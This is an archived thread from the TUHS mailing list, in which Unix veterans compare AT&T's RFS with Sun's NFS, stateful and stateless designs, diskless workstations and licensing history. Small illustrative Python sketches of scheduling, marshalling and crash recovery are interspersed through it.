  2017-09-29 19:19                                 ` Dan Cross
  3 siblings, 2 replies; 48+ messages in thread
From: Andreas Kusalananda Kähäri @ 2017-09-29  8:59 UTC (permalink / raw)



On Thu, Sep 28, 2017 at 03:20:56PM -0700, Larry McVoy wrote:
> On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
> > On Thu, 28 Sep 2017, Clem Cole wrote:
> > 
> > >Truth is that an Sun-3 running 'diskless' != as an Apollo running
> > >'twinned.' [There is a famous Clem' story I'll not repeat here from
> > >Masscomp about a typo I made, but your imagination would probably be right
> > >- when I refused to do build a diskless system for Masscomp]....
> > 
> > Not the infamous "dikless" workstation?  I remember a riposte from a woman
> > (on Usenet?), saying she didn't know that it was an option...
> 
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
> 
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.
> 
> --lm

My main work setup today is actually a diskless (X11-less) OpenBSD
system.  It's just something I set up in a VM environment to learn how
to do it (I'm on a work laptop running Windows 10, as I need Windows
for some few work-related tasks), but it works just fine and I have no
reason to change it.  For one thing, it makes backups easier as they can
run locally on the server.

At some point I hope to buy a smaller dedicated server to run the NFS
server (and mail, etc.) but I see no real reason not to keep running the
diskless client in a VM on my laptop.  Heck, then I might even be able
to netboot the laptop itself without disturbing the Windows system on it
at all...

> 
> (*) I did a distributed make when I was working on clusters.  Did the
> compiles on a pile of clients, all the data was on the NFS server, I started
> the build on the NFS server, did all the compiles remotely, did the link
> locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
> hacks were super jealous.  They were all sharing a big SMP machine with
> a Solaris that didn't scale for shit, I was way faster.
> 

OpenBSD has this "dpb" thing ("distributed ports builder",
/usr/ports/infrastructure/bin/dpb, http://man.openbsd.org/dpb) that
does distributed building of 3rd-party packages.  It does exactly this,
sharing the sources over NFS.


Cheers,

-- 
Andreas Kusalananda Kähäri,
National Bioinformatics Infrastructure Sweden (NBIS),
Uppsala University, Sweden.



* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
@ 2017-09-29  2:23                                 ` Kevin Bowling
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
                                                   ` (2 subsequent siblings)
  3 siblings, 0 replies; 48+ messages in thread
From: Kevin Bowling @ 2017-09-29  2:23 UTC (permalink / raw)


This is pretty much how we work today.  Build or crossbuild the kernel
on a host with your editor of choice and hopefully tons of cores like
my dual socket desktop.  Then netboot the device under test/victim.
Panic, edit, repeat, no panic :)

With modern CPUs and NICs you can pretty easily do diskless now.  But
for "scale out" designs there's something to be said for having lots
of fully independent systems, especially if the applications software
can avoid any artificial locality dependence.

On Thu, Sep 28, 2017 at 3:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
>> On Thu, 28 Sep 2017, Clem Cole wrote:
>>
>> >Truth is that an Sun-3 running 'diskless' != as an Apollo running
>> >'twinned.' [There is a famous Clem' story I'll not repeat here from
>> >Masscomp about a typo I made, but your imagination would probably be right
>> >- when I refused to do build a diskless system for Masscomp]....
>>
>> Not the infamous "dikless" workstation?  I remember a riposte from a woman
>> (on Usenet?), saying she didn't know that it was an option...
>
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
>
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.
>
> --lm
>
> (*) I did a distributed make when I was working on clusters.  Did the
> compiles on a pile of clients, all the data was on the NFS server, I started
> the build on the NFS server, did all the compiles remotely, did the link
> locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
> hacks were super jealous.  They were all sharing a big SMP machine with
> a Solaris that didn't scale for shit, I was way faster.
>




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:08                             ` Dave Horsfall
@ 2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
                                                   ` (3 more replies)
  0 siblings, 4 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 22:20 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
> On Thu, 28 Sep 2017, Clem Cole wrote:
> 
> >Truth is that an Sun-3 running 'diskless' != as an Apollo running
> >'twinned.' [There is a famous Clem' story I'll not repeat here from
> >Masscomp about a typo I made, but your imagination would probably be right
> >- when I refused to do build a diskless system for Masscomp]....
> 
> Not the infamous "dikless" workstation?  I remember a riposte from a woman
> (on Usenet?), saying she didn't know that it was an option...

I dunno why all the hating on diskless.  They actually work, I used the
heck out of them.  For kernel work, stacking one on top of the other,
the test machine being diskless, was a cheap way to get a setup.

Sure, disk was better and if your work load was write heavy then they
sucked (*), but for testing, for editing, that sort of thing, they were
fine.

--lm

(*) I did a distributed make when I was working on clusters.  Did the
compiles on a pile of clients, all the data was on the NFS server, I started
the build on the NFS server, did all the compiles remotely, did the link
locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
hacks were super jealous.  They were all sharing a big SMP machine with
a Solaris that didn't scale for shit, I was way faster.
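[Editor's sketch: the shape of that build can be modeled as a toy scheduler.
Host names and the relative compile/link cost numbers below are invented for
illustration, not Sun's actual tooling; the point is that the compiles fan
out across clients sharing the NFS-mounted tree, while the serial link step
bounds the speedup.]

```python
import math

# Toy scheduling model of a distributed make: compile jobs fan out
# across N clients that all see the same NFS-mounted source tree, and
# the final (write-heavy) link runs locally on the server.

def schedule(jobs, clients):
    """Round-robin the compile jobs across the client machines."""
    plan = {c: [] for c in clients}
    for i, job in enumerate(jobs):
        plan[clients[i % len(clients)]].append(job)
    return plan

def estimated_speedup(n_jobs, n_clients, compile_cost=1.0, link_cost=4.0):
    """Compiles parallelize; the link is serial, so Amdahl's law caps us."""
    serial = n_jobs * compile_cost + link_cost
    parallel = math.ceil(n_jobs / n_clients) * compile_cost + link_cost
    return serial / parallel

clients = ["node%02d" % i for i in range(16)]     # 16 hypothetical clients
jobs = ["cc -c src%d.c" % i for i in range(160)]  # 160 compile units
plan = schedule(jobs, clients)
```

With these made-up costs a 16-client setup lands near the 12x figure
mentioned above; the real number of course depends on how big the serial
link step is.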




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:27                           ` Clem Cole
@ 2017-09-28 22:08                             ` Dave Horsfall
  2017-09-28 22:20                               ` Larry McVoy
  0 siblings, 1 reply; 48+ messages in thread
From: Dave Horsfall @ 2017-09-28 22:08 UTC (permalink / raw)


On Thu, 28 Sep 2017, Clem Cole wrote:

> Truth is that an Sun-3 running 'diskless' != as an Apollo running 
> 'twinned.' [There is a famous Clem' story I'll not repeat here from 
> Masscomp about a typo I made, but your imagination would probably be 
> right - when I refused to do build a diskless system for Masscomp]....

Not the infamous "dikless" workstation?  I remember a riposte from a woman 
(on Usenet?), saying she didn't know that it was an option...

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:28                             ` arnold
@ 2017-09-28 20:00                             ` Bakul Shah
  1 sibling, 0 replies; 48+ messages in thread
From: Bakul Shah @ 2017-09-28 20:00 UTC (permalink / raw)




> On Sep 28, 2017, at 7:07 AM, Larry McVoy <lm at mcvoy.com> wrote:
> 
> On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
>> Kevin Bowling <kevin.bowling at kev009.com> wrote:
>> 
>>> I guess alternatively, what was interesting or neat, about RFS, if
>>> anything?  And what was bad?
>> 
>> Good: Stateful implementation, remote devices worked.
> 
> I'd argue that stateful is really hard to get right when machines panic
> or reboot.  Maybe you can do it on the client but how does one save all
> that state on the server when the server crashes?
> 
> NFS seems simple in hindsight but like a lot of things, getting to that
> simple wasn't chance, it was designed to be stateless because nobody
> had a way to save the state in any reasonable way.

I have some first hand experience with this.... in 1984.

Valid Logic Systems Inc., an early VLSI design vendor, hired me
as a contractor to fix bugs in a funky Ethernet driver they
had (from Lucasfilm, IIRC) that did some remote file
operations. I proposed that instead I do a "proper" networked
file system, and to my amazement they agreed to let me build a
prototype.
 
I first built an RPC layer (ethertype 1600 -- see RFC 1700!)
and then EFS (extended FS) that allowed access to remote 
files.  Being a one-man team I punted on generality and just
hand-built a separate marshal/unmarshal function for each
remote procedure.  No mounts. Every node's FS was visible to
everyone else (subject to Unix permissions). /net/ path prefix
was for remote files.
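[Editor's sketch: what one such hand-built marshal/unmarshal pair might
have looked like. The opcode and wire layout here are invented for
illustration; this is not the actual EFS protocol.]

```python
import struct

# One hand-rolled marshal/unmarshal pair for a single hypothetical
# remote procedure -- no stub generator, just explicit packing, in the
# spirit described above.

OP_READ = 3            # hypothetical opcode for "read remote file"
HDR = "!IIIH"          # opcode, offset, count, path length (big-endian)

def marshal_read(path, offset, count):
    p = path.encode()
    return struct.pack(HDR, OP_READ, offset, count, len(p)) + p

def unmarshal_read(buf):
    op, offset, count, plen = struct.unpack_from(HDR, buf)
    hdr = struct.calcsize(HDR)
    path = buf[hdr:hdr + plen].decode()
    return op, path, offset, count

msg = marshal_read("/net/foo/etc/motd", 0, 512)
```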
 
All this took about 2-3 months. Performance was decent for a
1984 era workstation. Encouraged by the progress I suggested
we add in missing functionality such as the ability to chdir 
to a remote dir etc. Yes, state! And complications!
 
On bootup every node advertised its presence & a "generation"
number (incremented by 1 from the last gen) so that other
nodes could drop old outstanding state -- not unlike a disk
dying, but still messy to clean up. Next I had to set the
scheduling priority of remote operations so that they were
interruptible. People didn't like "cd /net/foo" hanging indefinitely! unlink
and mv were a problem (machine A wouldn't know if machine B    
did this). rm was easy to fix -- just add a refcount for every
remote machine with an open. mv not so. I don't think I ever
solved this. Local FS read/write are atomic so I tried very
hard to make the remote read/writes atomic as well. This can
get interesting in presence of a node crashing....
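[Editor's sketch: the boot-generation trick can be modeled like this. The
class and method names are invented for illustration; the idea is just that
a different generation number means the client rebooted, so any state the
server holds for it is stale.]

```python
# Sketch of boot-generation cleanup: the server remembers the last
# generation each client advertised, and a changed generation means
# the client rebooted, so its old open-file state is dropped.

class FileServer:
    def __init__(self):
        self.client_gen = {}   # client -> last advertised generation
        self.open_refs = {}    # client -> set of files it holds open

    def advertise(self, client, gen):
        if self.client_gen.get(client) != gen:
            # new incarnation of the client: forget its old opens
            self.open_refs[client] = set()
            self.client_gen[client] = gen

    def open(self, client, path):
        self.open_refs[client].add(path)

srv = FileServer()
srv.advertise("nodeA", 7)
srv.open("nodeA", "/tmp/scratch")
srv.advertise("nodeA", 8)      # nodeA crashed and came back up
```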
 
At about this time, Sun gave a presentation on NFS to Valid.
I suspect Valid also realized that doing this properly was
a much bigger job than a one-man project. Result: they terminated
the project. It was a fun project while it lasted. The fact
this much was done was thanks to a lot of invaluable help
from my friend Jamie Markevitch (also a contractor @ Valid
at that point).

At the time I thought all of these stateful problems were
solvable given more time but now I am not so sure. But as
a result of that belief I never really liked NFS. I felt
they took the easy way out.




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:28                             ` arnold
@ 2017-09-28 19:49                               ` Larry McVoy
  0 siblings, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 19:49 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 08:28:08AM -0600, arnold at skeeve.com wrote:
> 
> > > Kevin Bowling <kevin.bowling at kev009.com> wrote:
> > > 
> > > > I guess alternatively, what was interesting or neat, about RFS, if
> > > > anything?  And what was bad?
> 
> > On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> > > Good: Stateful implementation, remote devices worked.
> 
> Larry McVoy <lm at mcvoy.com> wrote:
> 
> > I'd argue that stateful is really hard to get right when machines panic
> > or reboot.  Maybe you can do it on the client but how does one save all
> > that state on the server when the server crashes?
> >
> > NFS seems simple in hindsight but like a lot of things, getting to that
> > simple wasn't chance, it was designed to be stateless because nobody
> > had a way to save the state in any reasonable way.
> 
> I won't disagree with you.
> 
> I remember that stateful vs. stateless was one of the big technical
> debates of the time, and I remember that (my impression of) the general
> feeling was that stateful was better but much harder to do / get right.
> (Again, I don't want to start another long thread over this, especially
> as I don't really remember any more than what I just wrote.)
> 
> So we can downgrade "stateful" from "good" to "different" and let
> it go at that. :-)

That other post that had a link to a post from Rick Macklem tickled my
memory so I went looking.

He wrote this:

https://docs.freebsd.org/44doc/smm/06.nfs/paper.pdf

which included some of what Clem has hinted at (I think).  Did this stuff
ever go anywhere?  Is it BSD only?  Abandoned or what?

--lm




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:08 ` David
@ 2017-09-28 17:22   ` Pete Wright
  0 siblings, 0 replies; 48+ messages in thread
From: Pete Wright @ 2017-09-28 17:22 UTC (permalink / raw)





On 09/28/2017 07:08, David wrote:
>> It's important to note, when talking about NFS, that there was Sun's NFS
>> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
>> was where all the software that was not part of SunOS lived, it was an
>> NFS mounted volume (that was replicated to each subnet).  It was heavily
>> used as were a lot of other things.  The automounter at Sun just worked,
>> wanted to see your buddies stuff?  You just cd-ed to it and it worked.
>>
>> Much like mmap, NFS did not export well to other companies.  When I went
>> to SGI I actually had a principle engineer (like Suns distinguished
>> engineer) tell me "nobody trusts NFS, use rcp if you care about your
>> data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
>> The idea that it would not work was unthinkable and if it ever did
>> not work it got fixed right away.
>>
>> Other companies, it was a checkbox thing, it sorta worked.  That was
>> an eye opener for me.  mmap was the same way, Sun got it right and
>> other companies sort of did.
>>
> I remember the days of NFS Connect-a-thons where all the different
> vendors would get together and see if they all interoperated. It was
> interesting to see who worked and who didn’t. And all the hacking to
> fix your implementation to talk to vendor X while not breaking it working
> with vendor Y.
>
> Good times indeed.

It is funny you mention this - someone mentioned Red Hat is doing 
something similar in Boston next week:

https://lists.freebsd.org/pipermail/freebsd-current/2017-September/067013.html

-pete

-- 
Pete Wright
pete at nomadlogic.org
@nomadlogicLA




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:45                             ` Larry McVoy
@ 2017-09-28 17:12                               ` Steve Johnson
  0 siblings, 0 replies; 48+ messages in thread
From: Steve Johnson @ 2017-09-28 17:12 UTC (permalink / raw)



I remember Bill Joy visiting Bell Labs and getting a very complete
demo of RFS and being very impressed.  Within a year, Sun announced
NFS.  It took USG 18 months after that to get RFS out the door. 
Just another example of how AT&T could take a technical advantage and
manage to squander it...

Steve





* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:07                           ` Larry McVoy
@ 2017-09-28 14:28                             ` arnold
  2017-09-28 19:49                               ` Larry McVoy
  2017-09-28 20:00                             ` Bakul Shah
  1 sibling, 1 reply; 48+ messages in thread
From: arnold @ 2017-09-28 14:28 UTC (permalink / raw)



> > Kevin Bowling <kevin.bowling at kev009.com> wrote:
> > 
> > > I guess alternatively, what was interesting or neat, about RFS, if
> > > anything?  And what was bad?

> On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> > Good: Stateful implementation, remote devices worked.

Larry McVoy <lm at mcvoy.com> wrote:

> I'd argue that stateful is really hard to get right when machines panic
> or reboot.  Maybe you can do it on the client but how does one save all
> that state on the server when the server crashes?
>
> NFS seems simple in hindsight but like a lot of things, getting to that
> simple wasn't chance, it was designed to be stateless because nobody
> had a way to save the state in any reasonable way.

I won't disagree with you.

I remember that stateful vs. stateless was one of the big technical
debates of the time, and I remember that (my impression of) the general
feeling was that stateful was better but much harder to do / get right.
(Again, I don't want to start another long thread over this, especially
as I don't really remember any more than what I just wrote.)

So we can downgrade "stateful" from "good" to "different" and let
it go at that. :-)

Thanks,

Arnold




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:49                         ` arnold
  2017-09-28 14:07                           ` Larry McVoy
@ 2017-09-28 14:27                           ` Clem Cole
  2017-09-28 22:08                             ` Dave Horsfall
  1 sibling, 1 reply; 48+ messages in thread
From: Clem Cole @ 2017-09-28 14:27 UTC (permalink / raw)



On Thu, Sep 28, 2017 at 9:49 AM, <arnold at skeeve.com> wrote:

> Kevin Bowling <kevin.bowling at kev009.com> wrote:
>
> > I guess alternatively, what was interesting or neat, about RFS, if
> > anything?  And what was bad?
>
> Good: Stateful implementation, remote devices worked.

Right -- and full POSIX file system semantics.  Everything worked as you
expected -- no surprises.



> Bad: Sent binary over the wire, making interoperability harder.

Yup -- Peter used a very simple function-shipping model in Eighth Edition
and Dave did the same with RFS.   With Plan 9 they got more sophisticated.
Plan 9 and EFS were more similar in that aspect.

The other thing RFS did not have 'out of the box' was 'diskless.'

Truth is that a Sun-3 running 'diskless' != an Apollo running
'twinned.'  [There is a famous Clem story I'll not repeat here from
Masscomp, about a typo I made -- your imagination would probably be right
-- from when I refused to build a diskless system for Masscomp]....

But 'diskless' was the world's sleaziest 'add-in' disk business, and Sun
sold a ton of systems.   People were not going to toss out their diskless
system when they discovered the performance sucked.  They bought a disk for
them (even though a Masscomp or an Apollo with a disk was cheaper to start).

[It was brilliant marketing on Sun's part...  It was the #1 thing that made
Sun succeed early on.  NFS and the low-end entry system made Sun ... they
nailed it.]



> Also, at System V Release 3 AT&T made the licensing terms much harder
> for the big vendors to swallow (DEC, IBM, HP ...) so many of them
> didn't bother.

The funny part was that SVR3 was the 'final' license most of the vendors
(IBM, HP, DEC) used when it was done.  IBM and HP both bought it out; DEC
never did, although DEC shipped Tru64 on an SVR3 license.

Sun bought out an SVR4 license, but that was different.



> I don't remember the details; something like having to pass
> a validation suite to be called "UNIX" and who knows what else.

The suite was only part of the issue; there were other terms that AT&T
backed off from when IBM, HP, et al. pushed back.    They all had System III
licenses; AT&T really wanted to move them to SVR3 licenses.




> As others have noted, the Unix wars were a sad, sad story, and I'd
> as soon not see the details rehashed endlessly.

I agree -- it was a sad, sad time.   It was a 'who is going to control
this' issue.  None of them could see that the tighter they grabbed, the
less control they had, and the more they ceded control to Microsoft.   As
you said: sad, sad times...




> But licensing was a big factor in the non-adoption of RFS, not just
> the technical side.  Sigh.

Hmm...   I'm not so sure.   If RFS had come out before NFS, maybe.  But
NFS took root and was cheap and easy and good enough for most of what
people needed to do.

That was what made it a brilliant solution.  I admire Kleiman for finding
the hole and doing such a good job of filling it.

In many ways, Dave did 'more' with RFS, but it was 'harder' to consume in
a number of different ways (both technical and political).



* [TUHS] RFS was: Re: UNIX of choice these days?
       [not found] <mailman.1219.1506559196.3779.tuhs@minnie.tuhs.org>
@ 2017-09-28 14:08 ` David
  2017-09-28 17:22   ` Pete Wright
  0 siblings, 1 reply; 48+ messages in thread
From: David @ 2017-09-28 14:08 UTC (permalink / raw)



> 
> It's important to note, when talking about NFS, that there was Sun's NFS
> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> was where all the software that was not part of SunOS lived, it was an
> NFS mounted volume (that was replicated to each subnet).  It was heavily
> used as were a lot of other things.  The automounter at Sun just worked,
> wanted to see your buddies stuff?  You just cd-ed to it and it worked.
> 
> Much like mmap, NFS did not export well to other companies.  When I went
> to SGI I actually had a principle engineer (like Suns distinguished
> engineer) tell me "nobody trusts NFS, use rcp if you care about your
> data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
> The idea that it would not work was unthinkable and if it ever did
> not work it got fixed right away.
> 
> Other companies, it was a checkbox thing, it sorta worked.  That was
> an eye opener for me.  mmap was the same way, Sun got it right and 
> other companies sort of did.
> 
I remember the days of NFS Connect-a-thons where all the different
vendors would get together and see if they all interoperated. It was
interesting to see who worked and who didn’t. And all the hacking to
fix your implementation to talk to vendor X while not breaking it working
with vendor Y.

Good times indeed.

	David




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:49                         ` arnold
@ 2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:28                             ` arnold
  2017-09-28 20:00                             ` Bakul Shah
  2017-09-28 14:27                           ` Clem Cole
  1 sibling, 2 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 14:07 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> Kevin Bowling <kevin.bowling at kev009.com> wrote:
> 
> > I guess alternatively, what was interesting or neat, about RFS, if
> > anything?  And what was bad?
> 
> Good: Stateful implementation, remote devices worked.

I'd argue that stateful is really hard to get right when machines panic
or reboot.  Maybe you can do it on the client but how does one save all
that state on the server when the server crashes?

NFS seems simple in hindsight but like a lot of things, getting to that
simple wasn't chance, it was designed to be stateless because nobody
had a way to save the state in any reasonable way.
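[Editor's sketch: a toy illustration of the stateless idea, not real NFS
code. Every request names the file handle and offset itself, so a freshly
rebooted server answers a retried request with no state to reconstruct.]

```python
# Toy stateless server: requests are self-describing (handle, offset,
# count), so the server keeps no per-client cursor and a crash loses
# nothing -- the client just retries.  The "disk" is a dict standing
# in for stable storage that survives reboots.

DISK = {"fh42": b"hello, world"}        # handle -> contents (invented)

def boot_server():
    def read(handle, offset, count):
        return DISK[handle][offset:offset + count]
    return read

srv = boot_server()
first = srv("fh42", 0, 5)    # client reads the first five bytes
srv = boot_server()          # server panics and reboots
rest = srv("fh42", 5, 7)     # the next (or retried) request just works
```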




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
  2017-09-28  0:54                         ` Dave Horsfall
@ 2017-09-28 13:49                         ` arnold
  2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:27                           ` Clem Cole
  2 siblings, 2 replies; 48+ messages in thread
From: arnold @ 2017-09-28 13:49 UTC (permalink / raw)


Kevin Bowling <kevin.bowling at kev009.com> wrote:

> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Good: Stateful implementation, remote devices worked.

Bad: Sent binary over the wire, making interoperability harder. Also,
at System V Release 3 AT&T made the licensing terms much harder for
the big vendors to swallow (DEC, IBM, HP ...) so many of them didn't
bother. I don't remember the details; something like having to pass
a validation suite to be called "UNIX" and who knows what else.
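[Editor's sketch: the "binary over the wire" interoperability problem can be
shown in a couple of lines -- the same value has a different byte layout on
little- and big-endian machines, which is exactly the ambiguity an agreed
network representation (as XDR later standardized) removes.]

```python
import struct

# Why shipping a native struct hurts interoperability: the same 32-bit
# value serializes differently on little- and big-endian machines, so
# raw binary bakes the sender's architecture into the protocol.

value = 0x00010203
little = struct.pack("<I", value)   # e.g. what a VAX-style client sends
big    = struct.pack(">I", value)   # e.g. what a 68k-style server expects

# the fix: both sides agree on one wire format (big-endian here, as XDR
# did) and convert at the edges
wire = struct.pack(">I", value)
decoded = struct.unpack(">I", wire)[0]
```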

As others have noted, the Unix wars were a sad, sad story, and I'd
as soon not see the details rehashed endlessly. But licensing was
a big factor in the non-adoption of RFS, not just the technical side.
Sigh.

Arnold




* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  3:19                           ` Theodore Ts'o
@ 2017-09-28 13:45                             ` Larry McVoy
  2017-09-28 17:12                               ` Steve Johnson
  0 siblings, 1 reply; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 13:45 UTC (permalink / raw)


On Wed, Sep 27, 2017 at 11:19:49PM -0400, Theodore Ts'o wrote:
> On Wed, Sep 27, 2017 at 05:39:54PM -0700, Larry McVoy wrote:
> > It's important to note, when talking about NFS, that there was Sun's NFS
> > and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> > was where all the software that was not part of SunOS lived, it was an
> > NFS mounted volume (that was replicated to each subnet).  It was heavily
> > used as were a lot of other things.  The automounter at Sun just worked,
> > wanted to see your buddies stuff?  You just cd-ed to it and it worked.
> 
> So the story that went around MIT Project Athena was that there was
> Sun's NFS, and then there was the version which Sun gave away for
> others to use, which was a clean-room re-implementation by a
> relatively junior engineer.  Which is why when a file was truncated
> and then rewritten, and "truncate this file" packet got reordered and
> got received after the "here's the new 4k of contents of the file",
> Hilarity Ensued.

No, the problem was that people didn't understand open-to-close
semantics.  Sun was actually an engineering organization that took
the rules seriously.   You know, stuff like sync writes actually
needing to be sync in order to get the semantics right.



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  0:39                         ` Larry McVoy
@ 2017-09-28  3:19                           ` Theodore Ts'o
  2017-09-28 13:45                             ` Larry McVoy
  0 siblings, 1 reply; 48+ messages in thread
From: Theodore Ts'o @ 2017-09-28  3:19 UTC (permalink / raw)


On Wed, Sep 27, 2017 at 05:39:54PM -0700, Larry McVoy wrote:
> It's important to note, when talking about NFS, that there was Sun's NFS
> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> was where all the software that was not part of SunOS lived, it was an
> NFS mounted volume (that was replicated to each subnet).  It was heavily
> used as were a lot of other things.  The automounter at Sun just worked,
> wanted to see your buddies stuff?  You just cd-ed to it and it worked.

So the story that went around MIT Project Athena was that there was
Sun's NFS, and then there was the version which Sun gave away for
others to use, which was a clean-room re-implementation by a
relatively junior engineer.  Which is why when a file was truncated
and then rewritten, and "truncate this file" packet got reordered and
got received after the "here's the new 4k of contents of the file",
Hilarity Ensued.
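The reordering failure described above can be sketched in a few lines: if the server tags each per-file operation with a sequence number and drops anything older than what it has already applied, the late-arriving truncate is harmlessly discarded. This is a hypothetical illustration of the general fix, not code from any NFS implementation:

```python
# Sketch: a per-file sequence number lets the server detect and drop
# reordered packets.  (Hypothetical illustration only.)
class FileServer:
    def __init__(self):
        self.data = {}      # path -> file contents
        self.last_seq = {}  # path -> highest sequence number applied

    def apply(self, path, seq, op, payload=b""):
        if seq <= self.last_seq.get(path, -1):
            return False            # stale, reordered packet: ignore it
        self.last_seq[path] = seq
        if op == "truncate":
            self.data[path] = b""
        elif op == "write":
            self.data[path] = payload
        return True

srv = FileServer()
# Client sends truncate (seq 1) then write (seq 2), but the network
# delivers the write first and the truncate late.
srv.apply("f", 2, "write", b"new 4k of contents")
srv.apply("f", 1, "truncate")       # arrives late; dropped as stale
assert srv.data["f"] == b"new 4k of contents"
```

Without the sequence check, the late truncate would wipe out the freshly written contents -- exactly the "truncate reordered after write" bug.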

I'm pretty sure the last part was true, because we debugged it at MIT.
Does anyone know if the bit about the "open source" version of NFS being
a crappy reimplementation which Sun "gifted" to the rest of the
industry was true or not?

					- Ted



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  0:54                         ` Dave Horsfall
@ 2017-09-28  0:59                           ` William Pechter
  0 siblings, 0 replies; 48+ messages in thread
From: William Pechter @ 2017-09-28  0:59 UTC (permalink / raw)


I seem to remember it supported remote devices including tape drives.

Never was lucky enough to have hardware to run it.  Later, the wife had a 3b2... 

I never had any way to talk to it beyond uucp. 

Bill

-----Original Message-----
From: Dave Horsfall <dave@horsfall.org>
To: The Eunuchs Hysterical Society <tuhs at tuhs.org>
Sent: Wed, 27 Sep 2017 8:54 PM
Subject: Re: [TUHS] RFS was: Re: UNIX of choice these days?

On Wed, 27 Sep 2017, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Didn't it support remote devices?  Or am I thinking of something else?

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
@ 2017-09-28  0:54                         ` Dave Horsfall
  2017-09-28  0:59                           ` William Pechter
  2017-09-28 13:49                         ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Dave Horsfall @ 2017-09-28  0:54 UTC (permalink / raw)


On Wed, 27 Sep 2017, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Didn't it support remote devices?  Or am I thinking of something else?

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
@ 2017-09-28  0:39                         ` Larry McVoy
  2017-09-28  3:19                           ` Theodore Ts'o
  2017-09-28  0:54                         ` Dave Horsfall
  2017-09-28 13:49                         ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Larry McVoy @ 2017-09-28  0:39 UTC (permalink / raw)


I'll weigh in on this since my office mate at Sun was the Sun RFS guy
(Howard Chartock -- great guy, Mr. swapfs).  I still remember a long
discussion we had outside of Antonio's Nut House in Palo Alto about how
to tie different swap files to process groups so we could do better at
pagein/pageout, but I digress.  I should write up that discussion
though, it's still useful today.

From what I remember, RFS worked well in a homogeneous environment.  It
passed structs in binary across the wire.

NFS was based on Sun's RPC stuff that marshalled and unmarshalled the
data.  So it worked with little ints and big ints and Intel byte order
and everyone else's byte order.  RFS not so much.  The RPC stuff is 
actually pretty sweet, I built something I called RPC vectors on top
of it, Ron will remember that, but I digress again.
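The byte-order point above is the heart of the RPC/XDR advantage: every value goes on the wire in a fixed big-endian layout, so a little-endian and a big-endian machine agree on what the bytes mean, whereas shipping raw native structs (as RFS did) only works between identical hosts. A rough sketch of the idea, not Sun's actual XDR code:

```python
import struct

# XDR-style marshalling: integers travel as 4 bytes, big-endian
# ("network order"), regardless of the sending host's byte order.
def xdr_pack_int(value):
    return struct.pack(">i", value)          # fixed big-endian layout

def xdr_unpack_int(data):
    return struct.unpack(">i", data[:4])[0]

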